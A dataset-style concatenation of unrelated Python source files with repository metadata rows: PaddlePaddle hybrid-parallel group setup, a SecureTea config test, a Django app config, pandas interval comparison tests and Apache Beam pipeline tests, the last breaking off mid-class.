for name in other_axis_names:
dim_num = self.get_dim_size(name)
ranges.append(range(dim_num))
all_result = []
for x in product(*ranges):
key_coord = {}
for other_name in other_axis_names:
key_coord[other_name] = x[other_axis_names.index(other_name)]
result = []
for i in range(0, self.get_dim_size(axis_name)):
key_coord[axis_name] = i
result.append(self._coord2rank[self.coordinate(**key_coord)])
all_result.append(result)
return all_result
class HybridCommunicateGroup(object):
def __init__(self, topology):
self.nranks = paddle.distributed.get_world_size()
self.global_rank = paddle.distributed.get_rank()
self._topo = topology
self._dp_degree = self._topo.get_dim('data')
self._mp_degree = self._topo.get_dim('model')
self._pp_degree = self._topo.get_dim('pipe')
self._data_parallel_id = self._get_data_parallel_id()
self._model_parallel_id = self._get_model_parallel_id()
self.stage_id = self._get_pipe_parallel_id()
assert self._check_vaild_topo(
), "Here is an unreasonable topogy setting. world_size: {}, but" \
"dp_num: {}, mp_num: {}, pp_num: {}".format(self.nranks, self._dp_degree,
self._mp_degree, self._pp_degree)
# create comm group for data parallel
self._dp_group, self._dp_comm_group = self._set_comm_group("data")
# create comm group for model parallel
self._mp_group, self._mp_comm_group = self._set_comm_group("model")
# create comm group for pipe parallel
self._pp_group, self._pp_comm_group = self._set_comm_group("pipe")
# create global group for check inf_nan / clip global norm
self._check_group, self._check_comm_group = self._set_check_group(
"data")
# create p2p group
self.is_first_stage = (self.stage_id == 0)
self.is_last_stage = (self.stage_id == (self._pp_degree - 1))
debug_str = "HybridParallelInfo: rank_id: %d, dp_degree: %d, " \
"mp_degree: %d, pp_degree: %d" % (self.global_rank, self._dp_degree,
self._mp_degree,self._pp_degree)
debug_str += "dp_group: %s, mp_group: %s, pp_group: %s, check/clip group: %s" % (
self._dp_group, self._mp_group, self._pp_group, self._check_group)
logger.info(debug_str)
global _HYBRID_PARALLEL_GROUP
_HYBRID_PARALLEL_GROUP = self
def get_parallel_mode(self):
# there are three modes : DataParallel / ModelParallel / PipelineParallel
if self._mp_degree == 1 and self._pp_degree == 1:
return ParallelMode.DATA_PARALLEL
elif self._mp_degree > 1 and self._pp_degree == 1:
# initialize the seed
return ParallelMode.MODEL_PARALLEL
elif self._pp_degree > 1:
return ParallelMode.PIPELINE_PARALLEL
def _check_vaild_topo(self):
return self._dp_degree * self._mp_degree * self._pp_degree == self.nranks
def _set_comm_group(self, parallel_method="data"):
parallel_group = []
parallel_comm_group = None
parallel_groups = self._topo.get_comm_list(parallel_method)
for group in parallel_groups:
comm_group = paddle.distributed.new_group(ranks=group)
if self.global_rank in group:
parallel_group = group
parallel_comm_group = comm_group
assert len(parallel_group) > 0
assert parallel_comm_group is not None
return parallel_group, parallel_comm_group
def _set_check_group(self, parallel_method="data"):
parallel_group = []
parallel_comm_group = None
parallel_size = self._topo.get_dim(parallel_method)
for idx in range(parallel_size):
parallel_groups = self._topo.get_axis_list(parallel_method, idx)
comm_group = paddle.distributed.new_group(ranks=parallel_groups)
if self.global_rank in parallel_groups:
parallel_group = parallel_groups
parallel_comm_group = comm_group
assert len(parallel_group) > 0
assert parallel_comm_group is not None
return parallel_group, parallel_comm_group
def topology(self):
return self._topo
def get_global_rank(self):
return self.global_rank
# data parallel message:
def _get_data_parallel_id(self):
return self._topo.get_coord(self.global_rank).data
def get_data_parallel_rank(self):
return self._data_parallel_id
def get_data_parallel_world_size(self):
return self._dp_degree
def get_data_parallel_group(self):
return self._dp_comm_group
def get_data_parallel_group_src_rank(self):
return self._dp_comm_group.ranks[0]
# model parallel message:
def _get_model_parallel_id(self):
return self._topo.get_coord(self.global_rank).model
def get_model_parallel_rank(self):
return self._model_parallel_id
def get_model_parallel_world_size(self):
return self._mp_degree
def get_model_parallel_group(self):
return self._mp_comm_group
def get_model_parallel_group_src_rank(self):
return self._mp_comm_group.ranks[0]
# pipeline parallel message
def _get_pipe_parallel_id(self):
return self._topo.get_coord(self.global_rank).pipe
def get_stage_id(self):
return self.stage_id
def get_pipe_parallel_world_size(self):
return self._pp_degree
def get_pipe_parallel_group(self):
return self._pp_comm_group
# check parallel group
def get_check_parallel_group(self):
return self._check_comm_group
| 34.453125 | 89 | 0.665306 |
9af731bd4ac9df7164b23a089b91fefc267da7f6 | 1,596 | py | Python | test/test_configurations.py | idresearchdev/SecureTea-Project | 6ddd47f4897c0d22ade520bcc07197dcd3a0e2a4 | [
"MIT"
] | 1 | 2019-03-26T11:01:03.000Z | 2019-03-26T11:01:03.000Z | test/test_configurations.py | idresearchdev/SecureTea-Project | 6ddd47f4897c0d22ade520bcc07197dcd3a0e2a4 | [
"MIT"
] | null | null | null | test/test_configurations.py | idresearchdev/SecureTea-Project | 6ddd47f4897c0d22ade520bcc07197dcd3a0e2a4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import unittest
from securetea import configurations
import argparse
import json
try:
# if python 3.x.x
from unittest.mock import patch
except ImportError: # python 2.x.x
from mock import patch
class TestConfigurations(unittest.TestCase):
"""
Test class for Configurations.
"""
def setUp(self):
"""
Setup test class for Configurations.
"""
# Setup configurations object
self.conf_obj = configurations.SecureTeaConf()
self._CONFIG_PATH = 'securetea.conf'
# Load credentials
with open(self._CONFIG_PATH) as f:
self.creds = json.load(f)
self.dummy_dict = {
"Key1": "Value1"
}
def test_get_json(self):
"""
Test get_json.
"""
self.assertEqual(self.creds,
self.conf_obj.get_json(path='securetea.conf'))
@patch('securetea.configurations.json')
def test_get_creds(self, mock_json):
"""
Test get_creds.
"""
mock_json.load.return_value = self.dummy_dict
parser = argparse.ArgumentParser()
parser.add_argument('--conf',
type=str)
args = parser.parse_args()
creds = self.conf_obj.get_creds(args)
self.assertEqual(self.dummy_dict, creds)
@patch('securetea.configurations.os')
def test_save_creds(self, mock_os):
"""
Test save_creds.
"""
self.conf_obj.save_creds(data=self.dummy_dict)
self.assertTrue(mock_os.makedirs.called)
| 25.333333 | 71 | 0.593985 |
1c804b5b2c7da5e3e9977c24fc8c67eef0330723 | 94 | py | Python | admin_user/apps.py | lurdray/medexpress_app | f6b6cae3a0646697ee142305904ee6cfa44a0cf8 | [
"MIT"
] | null | null | null | admin_user/apps.py | lurdray/medexpress_app | f6b6cae3a0646697ee142305904ee6cfa44a0cf8 | [
"MIT"
] | 1 | 2019-05-22T15:05:44.000Z | 2019-05-22T15:05:44.000Z | admin_user/apps.py | lurdray/medexpress_app | f6b6cae3a0646697ee142305904ee6cfa44a0cf8 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class AdminUserConfig(AppConfig):
name = 'admin_user'
| 15.666667 | 33 | 0.765957 |
4473d86fa04a19fdf4a900054c93de75ea8296ab | 10,369 | py | Python | venv/lib/python3.9/site-packages/pandas/tests/arithmetic/test_interval.py | qarik-hanrattyjen/apache-airflow-backport-providers-google-2021.3.3 | 630dcef73e6a258b6e9a52f934e2dd912ce741f8 | [
"Apache-2.0"
] | 1 | 2021-10-04T18:22:12.000Z | 2021-10-04T18:22:12.000Z | venv/lib/python3.9/site-packages/pandas/tests/arithmetic/test_interval.py | qarik-hanrattyjen/apache-airflow-backport-providers-google-2021.3.3 | 630dcef73e6a258b6e9a52f934e2dd912ce741f8 | [
"Apache-2.0"
] | 10 | 2021-06-16T20:48:32.000Z | 2021-10-04T18:22:02.000Z | venv/lib/python3.9/site-packages/pandas/tests/arithmetic/test_interval.py | qarik-hanrattyjen/apache-airflow-backport-providers-google-2021.3.3 | 630dcef73e6a258b6e9a52f934e2dd912ce741f8 | [
"Apache-2.0"
] | 2 | 2021-07-12T13:33:42.000Z | 2021-08-13T09:52:35.000Z | import operator
import numpy as np
import pytest
from pandas.core.dtypes.common import is_list_like
import pandas as pd
from pandas import (
Categorical,
Index,
Interval,
IntervalIndex,
Period,
Series,
Timedelta,
Timestamp,
date_range,
period_range,
timedelta_range,
)
import pandas._testing as tm
from pandas.core.arrays import IntervalArray
@pytest.fixture(
params=[
(Index([0, 2, 4, 4]), Index([1, 3, 5, 8])),
(Index([0.0, 1.0, 2.0, np.nan]), Index([1.0, 2.0, 3.0, np.nan])),
(
timedelta_range("0 days", periods=3).insert(4, pd.NaT),
timedelta_range("1 day", periods=3).insert(4, pd.NaT),
),
(
date_range("20170101", periods=3).insert(4, pd.NaT),
date_range("20170102", periods=3).insert(4, pd.NaT),
),
(
date_range("20170101", periods=3, tz="US/Eastern").insert(4, pd.NaT),
date_range("20170102", periods=3, tz="US/Eastern").insert(4, pd.NaT),
),
],
ids=lambda x: str(x[0].dtype),
)
def left_right_dtypes(request):
"""
Fixture for building an IntervalArray from various dtypes
"""
return request.param
@pytest.fixture
def array(left_right_dtypes):
"""
Fixture to generate an IntervalArray of various dtypes containing NA if possible
"""
left, right = left_right_dtypes
return IntervalArray.from_arrays(left, right)
def create_categorical_intervals(left, right, closed="right"):
return Categorical(IntervalIndex.from_arrays(left, right, closed))
def create_series_intervals(left, right, closed="right"):
return Series(IntervalArray.from_arrays(left, right, closed))
def create_series_categorical_intervals(left, right, closed="right"):
return Series(Categorical(IntervalIndex.from_arrays(left, right, closed)))
class TestComparison:
@pytest.fixture(params=[operator.eq, operator.ne])
def op(self, request):
return request.param
@pytest.fixture(
params=[
IntervalArray.from_arrays,
IntervalIndex.from_arrays,
create_categorical_intervals,
create_series_intervals,
create_series_categorical_intervals,
],
ids=[
"IntervalArray",
"IntervalIndex",
"Categorical[Interval]",
"Series[Interval]",
"Series[Categorical[Interval]]",
],
)
def interval_constructor(self, request):
"""
Fixture for all pandas native interval constructors.
To be used as the LHS of IntervalArray comparisons.
"""
return request.param
def elementwise_comparison(self, op, array, other):
"""
Helper that performs elementwise comparisons between `array` and `other`
"""
other = other if is_list_like(other) else [other] * len(array)
expected = np.array([op(x, y) for x, y in zip(array, other)])
if isinstance(other, Series):
return Series(expected, index=other.index)
return expected
def test_compare_scalar_interval(self, op, array):
# matches first interval
other = array[0]
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_numpy_array_equal(result, expected)
# matches on a single endpoint but not both
other = Interval(array.left[0], array.right[1])
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_numpy_array_equal(result, expected)
def test_compare_scalar_interval_mixed_closed(self, op, closed, other_closed):
array = IntervalArray.from_arrays(range(2), range(1, 3), closed=closed)
other = Interval(0, 1, closed=other_closed)
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_numpy_array_equal(result, expected)
def test_compare_scalar_na(self, op, array, nulls_fixture, request):
result = op(array, nulls_fixture)
expected = self.elementwise_comparison(op, array, nulls_fixture)
if nulls_fixture is pd.NA and array.dtype != pd.IntervalDtype("int64"):
mark = pytest.mark.xfail(
reason="broken for non-integer IntervalArray; see GH 31882"
)
request.node.add_marker(mark)
tm.assert_numpy_array_equal(result, expected)
@pytest.mark.parametrize(
"other",
[
0,
1.0,
True,
"foo",
Timestamp("2017-01-01"),
Timestamp("2017-01-01", tz="US/Eastern"),
Timedelta("0 days"),
Period("2017-01-01", "D"),
],
)
def test_compare_scalar_other(self, op, array, other):
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_numpy_array_equal(result, expected)
def test_compare_list_like_interval(self, op, array, interval_constructor):
# same endpoints
other = interval_constructor(array.left, array.right)
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_equal(result, expected)
# different endpoints
other = interval_constructor(array.left[::-1], array.right[::-1])
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_equal(result, expected)
# all nan endpoints
other = interval_constructor([np.nan] * 4, [np.nan] * 4)
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_equal(result, expected)
def test_compare_list_like_interval_mixed_closed(
self, op, interval_constructor, closed, other_closed
):
array = IntervalArray.from_arrays(range(2), range(1, 3), closed=closed)
other = interval_constructor(range(2), range(1, 3), closed=other_closed)
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_equal(result, expected)
@pytest.mark.parametrize(
"other",
[
(
Interval(0, 1),
Interval(Timedelta("1 day"), Timedelta("2 days")),
Interval(4, 5, "both"),
Interval(10, 20, "neither"),
),
(0, 1.5, Timestamp("20170103"), np.nan),
(
Timestamp("20170102", tz="US/Eastern"),
Timedelta("2 days"),
"baz",
pd.NaT,
),
],
)
def test_compare_list_like_object(self, op, array, other):
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_numpy_array_equal(result, expected)
def test_compare_list_like_nan(self, op, array, nulls_fixture, request):
other = [nulls_fixture] * 4
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
if nulls_fixture is pd.NA and array.dtype.subtype != "i8":
reason = "broken for non-integer IntervalArray; see GH 31882"
mark = pytest.mark.xfail(reason=reason)
request.node.add_marker(mark)
tm.assert_numpy_array_equal(result, expected)
@pytest.mark.parametrize(
"other",
[
np.arange(4, dtype="int64"),
np.arange(4, dtype="float64"),
date_range("2017-01-01", periods=4),
date_range("2017-01-01", periods=4, tz="US/Eastern"),
timedelta_range("0 days", periods=4),
period_range("2017-01-01", periods=4, freq="D"),
Categorical(list("abab")),
Categorical(date_range("2017-01-01", periods=4)),
pd.array(list("abcd")),
pd.array(["foo", 3.14, None, object()], dtype=object),
],
ids=lambda x: str(x.dtype),
)
def test_compare_list_like_other(self, op, array, other):
result = op(array, other)
expected = self.elementwise_comparison(op, array, other)
tm.assert_numpy_array_equal(result, expected)
@pytest.mark.parametrize("length", [1, 3, 5])
@pytest.mark.parametrize("other_constructor", [IntervalArray, list])
def test_compare_length_mismatch_errors(self, op, other_constructor, length):
array = IntervalArray.from_arrays(range(4), range(1, 5))
other = other_constructor([Interval(0, 1)] * length)
with pytest.raises(ValueError, match="Lengths must match to compare"):
op(array, other)
@pytest.mark.parametrize(
"constructor, expected_type, assert_func",
[
(IntervalIndex, np.array, tm.assert_numpy_array_equal),
(Series, Series, tm.assert_series_equal),
],
)
def test_index_series_compat(self, op, constructor, expected_type, assert_func):
# IntervalIndex/Series that rely on IntervalArray for comparisons
breaks = range(4)
index = constructor(IntervalIndex.from_breaks(breaks))
# scalar comparisons
other = index[0]
result = op(index, other)
expected = expected_type(self.elementwise_comparison(op, index, other))
assert_func(result, expected)
other = breaks[0]
result = op(index, other)
expected = expected_type(self.elementwise_comparison(op, index, other))
assert_func(result, expected)
# list-like comparisons
other = IntervalArray.from_breaks(breaks)
result = op(index, other)
expected = expected_type(self.elementwise_comparison(op, index, other))
assert_func(result, expected)
other = [index[0], breaks[0], "foo"]
result = op(index, other)
expected = expected_type(self.elementwise_comparison(op, index, other))
assert_func(result, expected)
@pytest.mark.parametrize("scalars", ["a", False, 1, 1.0, None])
def test_comparison_operations(self, scalars):
# GH #28981
expected = Series([False, False])
s = Series([Interval(0, 1), Interval(1, 2)], dtype="interval")
result = s == scalars
tm.assert_series_equal(result, expected)
| 35.030405 | 84 | 0.617996 |
2b62745afefa2c17def00230565c05c0034a5011 | 25,617 | py | Python | sdks/python/apache_beam/pipeline_test.py | charithe/beam | f085cb500730cf0c67c467ac55f92b3c59f52b39 | [
"Apache-2.0"
] | 2 | 2020-06-25T00:47:43.000Z | 2020-08-24T14:25:13.000Z | sdks/python/apache_beam/pipeline_test.py | charithe/beam | f085cb500730cf0c67c467ac55f92b3c59f52b39 | [
"Apache-2.0"
] | 10 | 2017-07-20T13:38:13.000Z | 2017-08-03T15:49:24.000Z | sdks/python/apache_beam/pipeline_test.py | charithe/beam | f085cb500730cf0c67c467ac55f92b3c59f52b39 | [
"Apache-2.0"
] | 1 | 2019-08-14T00:55:53.000Z | 2019-08-14T00:55:53.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for the Pipeline class."""
from __future__ import absolute_import
import copy
import logging
import platform
import unittest
from builtins import object
from builtins import range
from collections import defaultdict
import mock
import apache_beam as beam
from apache_beam import typehints
from apache_beam.coders import BytesCoder
from apache_beam.io import Read
from apache_beam.metrics import Metrics
from apache_beam.pipeline import Pipeline
from apache_beam.pipeline import PipelineOptions
from apache_beam.pipeline import PipelineVisitor
from apache_beam.pipeline import PTransformOverride
from apache_beam.pvalue import AsSingleton
from apache_beam.runners.dataflow.native_io.iobase import NativeSource
from apache_beam.runners.direct.evaluation_context import _ExecutionContext
from apache_beam.runners.direct.transform_evaluator import _GroupByKeyOnlyEvaluator
from apache_beam.runners.direct.transform_evaluator import _TransformEvaluator
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
from apache_beam.transforms import CombineGlobally
from apache_beam.transforms import Create
from apache_beam.transforms import DoFn
from apache_beam.transforms import FlatMap
from apache_beam.transforms import Map
from apache_beam.transforms import ParDo
from apache_beam.transforms import PTransform
from apache_beam.transforms import WindowInto
from apache_beam.transforms.userstate import BagStateSpec
from apache_beam.transforms.window import SlidingWindows
from apache_beam.transforms.window import TimestampedValue
from apache_beam.utils.timestamp import MIN_TIMESTAMP
# TODO(BEAM-1555): Test is failing on the service, with FakeSource.
# from nose.plugins.attrib import attr
class FakeSource(NativeSource):
"""Fake source returning a fixed list of values."""
class _Reader(object):
def __init__(self, vals):
self._vals = vals
self._output_counter = Metrics.counter('main', 'outputs')
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
pass
def __iter__(self):
for v in self._vals:
self._output_counter.inc()
yield v
def __init__(self, vals):
self._vals = vals
def reader(self):
return FakeSource._Reader(self._vals)
class DoubleParDo(beam.PTransform):
def expand(self, input):
return input | 'Inner' >> beam.Map(lambda a: a * 2)
def to_runner_api_parameter(self, context):
return self.to_runner_api_pickled(context)
class TripleParDo(beam.PTransform):
def expand(self, input):
# Keeping labels the same intentionally to make sure that there is no label
# conflict due to replacement.
return input | 'Inner' >> beam.Map(lambda a: a * 3)
class ToStringParDo(beam.PTransform):
def expand(self, input):
# We use copy.copy() here to make sure the typehint mechanism doesn't
# automatically infer that the output type is str.
return input | 'Inner' >> beam.Map(lambda a: copy.copy(str(a)))
class PipelineTest(unittest.TestCase):
@staticmethod
def custom_callable(pcoll):
return pcoll | '+1' >> FlatMap(lambda x: [x + 1])
# Some of these tests designate a runner by name, others supply a runner.
# This variation is just to verify that both means of runner specification
# work and is not related to other aspects of the tests.
class CustomTransform(PTransform):
def expand(self, pcoll):
return pcoll | '+1' >> FlatMap(lambda x: [x + 1])
class Visitor(PipelineVisitor):
def __init__(self, visited):
self.visited = visited
self.enter_composite = []
self.leave_composite = []
def visit_value(self, value, _):
self.visited.append(value)
def enter_composite_transform(self, transform_node):
self.enter_composite.append(transform_node)
def leave_composite_transform(self, transform_node):
self.leave_composite.append(transform_node)
def test_create(self):
pipeline = TestPipeline()
pcoll = pipeline | 'label1' >> Create([1, 2, 3])
assert_that(pcoll, equal_to([1, 2, 3]))
# Test if initial value is an iterator object.
pcoll2 = pipeline | 'label2' >> Create(iter((4, 5, 6)))
pcoll3 = pcoll2 | 'do' >> FlatMap(lambda x: [x + 10])
assert_that(pcoll3, equal_to([14, 15, 16]), label='pcoll3')
pipeline.run()
def test_flatmap_builtin(self):
pipeline = TestPipeline()
pcoll = pipeline | 'label1' >> Create([1, 2, 3])
assert_that(pcoll, equal_to([1, 2, 3]))
pcoll2 = pcoll | 'do' >> FlatMap(lambda x: [x + 10])
assert_that(pcoll2, equal_to([11, 12, 13]), label='pcoll2')
pcoll3 = pcoll2 | 'm1' >> Map(lambda x: [x, 12])
assert_that(pcoll3,
equal_to([[11, 12], [12, 12], [13, 12]]), label='pcoll3')
pcoll4 = pcoll3 | 'do2' >> FlatMap(set)
assert_that(pcoll4, equal_to([11, 12, 12, 12, 13]), label='pcoll4')
pipeline.run()
def test_maptuple_builtin(self):
pipeline = TestPipeline()
pcoll = pipeline | Create([('e1', 'e2')])
side1 = beam.pvalue.AsSingleton(pipeline | 'side1' >> Create(['s1']))
side2 = beam.pvalue.AsSingleton(pipeline | 'side2' >> Create(['s2']))
# A test function with a tuple input, an auxiliary parameter,
# and some side inputs.
fn = lambda e1, e2, t=DoFn.TimestampParam, s1=None, s2=None: (
e1, e2, t, s1, s2)
assert_that(pcoll | 'NoSides' >> beam.core.MapTuple(fn),
equal_to([('e1', 'e2', MIN_TIMESTAMP, None, None)]),
label='NoSidesCheck')
assert_that(pcoll | 'StaticSides' >> beam.core.MapTuple(fn, 's1', 's2'),
equal_to([('e1', 'e2', MIN_TIMESTAMP, 's1', 's2')]),
label='StaticSidesCheck')
assert_that(pcoll | 'DynamicSides' >> beam.core.MapTuple(fn, side1, side2),
equal_to([('e1', 'e2', MIN_TIMESTAMP, 's1', 's2')]),
label='DynamicSidesCheck')
assert_that(pcoll | 'MixedSides' >> beam.core.MapTuple(fn, s2=side2),
equal_to([('e1', 'e2', MIN_TIMESTAMP, None, 's2')]),
label='MixedSidesCheck')
pipeline.run()
def test_flatmaptuple_builtin(self):
pipeline = TestPipeline()
pcoll = pipeline | Create([('e1', 'e2')])
side1 = beam.pvalue.AsSingleton(pipeline | 'side1' >> Create(['s1']))
side2 = beam.pvalue.AsSingleton(pipeline | 'side2' >> Create(['s2']))
# A test function with a tuple input, an auxiliary parameter,
# and some side inputs.
fn = lambda e1, e2, t=DoFn.TimestampParam, s1=None, s2=None: (
e1, e2, t, s1, s2)
assert_that(pcoll | 'NoSides' >> beam.core.FlatMapTuple(fn),
equal_to(['e1', 'e2', MIN_TIMESTAMP, None, None]),
label='NoSidesCheck')
assert_that(pcoll | 'StaticSides' >> beam.core.FlatMapTuple(fn, 's1', 's2'),
equal_to(['e1', 'e2', MIN_TIMESTAMP, 's1', 's2']),
label='StaticSidesCheck')
assert_that(pcoll
| 'DynamicSides' >> beam.core.FlatMapTuple(fn, side1, side2),
equal_to(['e1', 'e2', MIN_TIMESTAMP, 's1', 's2']),
label='DynamicSidesCheck')
assert_that(pcoll | 'MixedSides' >> beam.core.FlatMapTuple(fn, s2=side2),
equal_to(['e1', 'e2', MIN_TIMESTAMP, None, 's2']),
label='MixedSidesCheck')
pipeline.run()
def test_create_singleton_pcollection(self):
pipeline = TestPipeline()
pcoll = pipeline | 'label' >> Create([[1, 2, 3]])
assert_that(pcoll, equal_to([[1, 2, 3]]))
pipeline.run()
# TODO(BEAM-1555): Test is failing on the service, with FakeSource.
# @attr('ValidatesRunner')
def test_metrics_in_fake_source(self):
pipeline = TestPipeline()
pcoll = pipeline | Read(FakeSource([1, 2, 3, 4, 5, 6]))
assert_that(pcoll, equal_to([1, 2, 3, 4, 5, 6]))
res = pipeline.run()
metric_results = res.metrics().query()
outputs_counter = metric_results['counters'][0]
self.assertEqual(outputs_counter.key.step, 'Read')
self.assertEqual(outputs_counter.key.metric.name, 'outputs')
self.assertEqual(outputs_counter.committed, 6)
def test_fake_read(self):
pipeline = TestPipeline()
pcoll = pipeline | 'read' >> Read(FakeSource([1, 2, 3]))
assert_that(pcoll, equal_to([1, 2, 3]))
pipeline.run()
def test_visit_entire_graph(self):
pipeline = Pipeline()
pcoll1 = pipeline | 'pcoll' >> Create([1, 2, 3])
pcoll2 = pcoll1 | 'do1' >> FlatMap(lambda x: [x + 1])
pcoll3 = pcoll2 | 'do2' >> FlatMap(lambda x: [x + 1])
pcoll4 = pcoll2 | 'do3' >> FlatMap(lambda x: [x + 1])
transform = PipelineTest.CustomTransform()
pcoll5 = pcoll4 | transform
visitor = PipelineTest.Visitor(visited=[])
pipeline.visit(visitor)
self.assertEqual(set([pcoll1, pcoll2, pcoll3, pcoll4, pcoll5]),
set(visitor.visited))
self.assertEqual(set(visitor.enter_composite),
set(visitor.leave_composite))
self.assertEqual(3, len(visitor.enter_composite))
self.assertEqual(visitor.enter_composite[2].transform, transform)
self.assertEqual(visitor.leave_composite[1].transform, transform)
def test_apply_custom_transform(self):
pipeline = TestPipeline()
pcoll = pipeline | 'pcoll' >> Create([1, 2, 3])
result = pcoll | PipelineTest.CustomTransform()
assert_that(result, equal_to([2, 3, 4]))
pipeline.run()
def test_reuse_custom_transform_instance(self):
pipeline = Pipeline()
pcoll1 = pipeline | 'pcoll1' >> Create([1, 2, 3])
pcoll2 = pipeline | 'pcoll2' >> Create([4, 5, 6])
transform = PipelineTest.CustomTransform()
pcoll1 | transform
with self.assertRaises(RuntimeError) as cm:
pipeline.apply(transform, pcoll2)
self.assertEqual(
cm.exception.args[0],
'Transform "CustomTransform" does not have a stable unique label. '
'This will prevent updating of pipelines. '
'To apply a transform with a specified label write '
'pvalue | "label" >> transform')
def test_reuse_cloned_custom_transform_instance(self):
pipeline = TestPipeline()
pcoll1 = pipeline | 'pc1' >> Create([1, 2, 3])
pcoll2 = pipeline | 'pc2' >> Create([4, 5, 6])
transform = PipelineTest.CustomTransform()
result1 = pcoll1 | transform
result2 = pcoll2 | 'new_label' >> transform
assert_that(result1, equal_to([2, 3, 4]), label='r1')
assert_that(result2, equal_to([5, 6, 7]), label='r2')
pipeline.run()
def test_transform_no_super_init(self):
class AddSuffix(PTransform):
def __init__(self, suffix):
# No call to super(...).__init__
self.suffix = suffix
def expand(self, pcoll):
return pcoll | Map(lambda x: x + self.suffix)
self.assertEqual(
['a-x', 'b-x', 'c-x'],
sorted(['a', 'b', 'c'] | 'AddSuffix' >> AddSuffix('-x')))
@unittest.skip("Fails on some platforms with new urllib3.")
def test_memory_usage(self):
try:
import resource
except ImportError:
# Skip the test if resource module is not available (e.g. non-Unix os).
self.skipTest('resource module not available.')
if platform.mac_ver()[0]:
# Skip the test on macos, depending on version it returns ru_maxrss in
# different units.
self.skipTest('ru_maxrss is not in standard units.')
def get_memory_usage_in_bytes():
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * (2 ** 10)
def check_memory(value, memory_threshold):
memory_usage = get_memory_usage_in_bytes()
if memory_usage > memory_threshold:
raise RuntimeError(
'High memory usage: %d > %d' % (memory_usage, memory_threshold))
return value
len_elements = 1000000
num_elements = 10
num_maps = 100
# TODO(robertwb): reduce memory usage of FnApiRunner so that this test
# passes.
pipeline = TestPipeline(runner='BundleBasedDirectRunner')
# Consumed memory should not be proportional to the number of maps.
memory_threshold = (
get_memory_usage_in_bytes() + (5 * len_elements * num_elements))
# Plus small additional slack for memory fluctuations during the test.
memory_threshold += 10 * (2 ** 20)
biglist = pipeline | 'oom:create' >> Create(
['x' * len_elements] * num_elements)
for i in range(num_maps):
biglist = biglist | ('oom:addone-%d' % i) >> Map(lambda x: x + 'y')
result = biglist | 'oom:check' >> Map(check_memory, memory_threshold)
assert_that(result, equal_to(
['x' * len_elements + 'y' * num_maps] * num_elements))
pipeline.run()
def test_aggregator_empty_input(self):
actual = [] | CombineGlobally(max).without_defaults()
self.assertEqual(actual, [])
def test_pipeline_as_context(self):
def raise_exception(exn):
raise exn
with self.assertRaises(ValueError):
with Pipeline() as p:
# pylint: disable=expression-not-assigned
p | Create([ValueError('msg')]) | Map(raise_exception)
# TODO(BEAM-1894).
# def test_eager_pipeline(self):
# p = Pipeline('EagerRunner')
# self.assertEqual([1, 4, 9], p | Create([1, 2, 3]) | Map(lambda x: x*x))
@mock.patch(
'apache_beam.runners.direct.direct_runner._get_transform_overrides')
def test_ptransform_overrides(self, file_system_override_mock):
class MyParDoOverride(PTransformOverride):
def matches(self, applied_ptransform):
return isinstance(applied_ptransform.transform, DoubleParDo)
def get_replacement_transform(self, ptransform):
if isinstance(ptransform, DoubleParDo):
return TripleParDo()
raise ValueError('Unsupported type of transform: %r' % ptransform)
def get_overrides(unused_pipeline_options):
return [MyParDoOverride()]
file_system_override_mock.side_effect = get_overrides
# Specify DirectRunner as it's the one patched above.
with Pipeline(runner='BundleBasedDirectRunner') as p:
pcoll = p | beam.Create([1, 2, 3]) | 'Multiply' >> DoubleParDo()
assert_that(pcoll, equal_to([3, 6, 9]))
def test_ptransform_override_type_hints(self):
class NoTypeHintOverride(PTransformOverride):
def matches(self, applied_ptransform):
return isinstance(applied_ptransform.transform, DoubleParDo)
def get_replacement_transform(self, ptransform):
return ToStringParDo()
class WithTypeHintOverride(PTransformOverride):
def matches(self, applied_ptransform):
return isinstance(applied_ptransform.transform, DoubleParDo)
def get_replacement_transform(self, ptransform):
return (ToStringParDo()
.with_input_types(int)
.with_output_types(str))
for override, expected_type in [(NoTypeHintOverride(), typehints.Any),
(WithTypeHintOverride(), str)]:
p = TestPipeline()
pcoll = (p
| beam.Create([1, 2, 3])
| 'Operate' >> DoubleParDo()
| 'NoOp' >> beam.Map(lambda x: x))
p.replace_all([override])
self.assertEqual(pcoll.producer.inputs[0].element_type, expected_type)
def test_kv_ptransform_honor_type_hints(self):
# The return type of this DoFn cannot be inferred by the default
# Beam type inference
class StatefulDoFn(DoFn):
BYTES_STATE = BagStateSpec('bytes', BytesCoder())
def return_recursive(self, count):
if count == 0:
return ["some string"]
else:
self.return_recursive(count-1)
def process(self, element, counter=DoFn.StateParam(BYTES_STATE)):
return self.return_recursive(1)
p = TestPipeline()
pcoll = (p
| beam.Create([(1, 1), (2, 2), (3, 3)])
| beam.GroupByKey()
| beam.ParDo(StatefulDoFn()))
p.run()
self.assertEqual(pcoll.element_type, typehints.Any)
p = TestPipeline()
pcoll = (p
| beam.Create([(1, 1), (2, 2), (3, 3)])
| beam.GroupByKey()
| beam.ParDo(StatefulDoFn()).with_output_types(str))
p.run()
self.assertEqual(pcoll.element_type, str)
class DoFnTest(unittest.TestCase):
def test_element(self):
